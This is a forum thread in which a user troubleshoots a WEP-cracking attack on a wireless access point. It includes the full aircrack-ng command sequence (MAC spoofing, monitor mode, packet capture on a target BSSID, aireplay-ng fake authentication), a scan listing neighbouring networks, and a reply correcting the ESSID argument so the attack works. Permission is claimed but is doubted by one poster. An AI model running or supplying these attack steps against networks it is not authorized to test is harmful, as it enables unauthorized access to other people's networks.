Help Correct My Attack
I have a Netgear WG511T PCMCIA card. I have done a successful WEP crack before using this card and this method, but for some reason this isn't working with the particular AP in question.
airmon-ng stop ath0
ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0
BSSID              PWR  RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER  AUTH  ESSID
00:0F:3D:29:86:6F   46  100     6519    1362   1   6  54.  WEP  WEP           default
00:15:E9:E4:28:C9    6    1     4968      24   0   6  54.  WEP  WEP           default
00:19:5B:E0:95:58   17    0     4587       0   0   6  54.  WEP  WEP     OPN   PenTestNetwork
00:11:95:2C:51:E4    1    0      233       8   0   6  54.  OPN                hawkes
00:90:4C:7E:00:10   -1    0        0       0   0   6  -1                      telstra
Now it is the aireplay-ng command which isn't being successful. I get,
airodump-ng -c 6 -w dumpfile --bssid 00:19:5B:E0:95:58 ath0
aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
Can anyone help me out? Give me some ideas?
bt ~ # aireplay-ng -1 0 -a 00:19:5B:E0:95:58 -e 00:19:5B:E0:95:58 -h 00:11:22:33:44:55 ath0
13:09:40 Sending Authentication Request
13:09:40 Authentication successful
13:09:40 Sending Association Request
13:09:45 Sending Authentication Request
13:09:45 Authentication successful
13:09:45 Sending Association Request
13:09:50 Sending Authentication Request
13:09:50 Authentication successful
13:09:50 Sending Association Request
13:09:55 Sending Authentication Request
13:09:55 Authentication successful
13:09:55 Sending Association Request
13:10:00 Sending Authentication Request
13:10:00 Authentication successful
13:10:00 Sending Association Request
13:10:05 Sending Authentication Request
13:10:05 Authentication successful
13:10:05 Sending Association Request
13:10:10 Sending Authentication Request
13:10:10 Authentication successful
13:10:10 Sending Association Request
13:10:15 Sending Authentication Request
13:10:15 Authentication successful
13:10:15 Sending Association Request
13:10:20 Sending Authentication Request
13:10:20 Authentication successful
13:10:20 Sending Association Request
13:10:25 Sending Authentication Request
13:10:25 Authentication successful
13:10:25 Sending Association Request
13:10:30 Sending Authentication Request
13:10:30 Authentication successful
13:10:30 Sending Association Request
13:10:35 Sending Authentication Request
13:10:36 Authentication successful
13:10:36 Sending Association Request
13:10:43 Sending Authentication Request
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,
Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
Your AP or someone else's? Do you have permission?
Sounds like the victim AP has MAC filtering enabled...
Not being a troll or anything but I think it's because you are too far away m8t. Because MAC filtering wouldn't even let you associate at all.
Very low signal!!!
And because of that, it makes me think that the AP in question is not yours, so I'm not going to say any more.
I apologize if I am wrong :D
How far are you from the AP and what kind of model is the AP?
Apology accepted :p
Originally Posted by Dr_GrEeN
It's a D-Link and it's down 1 flight of stairs and about 20 metres away. The router is in my dad's study and I was sitting in my room, upstairs on the other side of the house.
Originally Posted by swc666
The PWR level was fluctuating between 15 and 25. So moving closer should help?
My dad said he doesn't even know what MAC filtering is, so I'm pretty sure it's not enabled.
You are using the BSSID for the ESSID bro.
The -e argument is where you put the ESSID, and you put the MAC address there; that's why it's partially successful but ultimately fails.
Put the ESSID after the -e (it's case sensitive) and try again, should work.
OMG, I have serious problems :P Thanks a lot, dude. Can't believe I missed that.
Originally Posted by SonyUSA
Thanks swc666... that's more or less what I was following, except I messed up the whole ESSID thing, as SonyUSA discovered.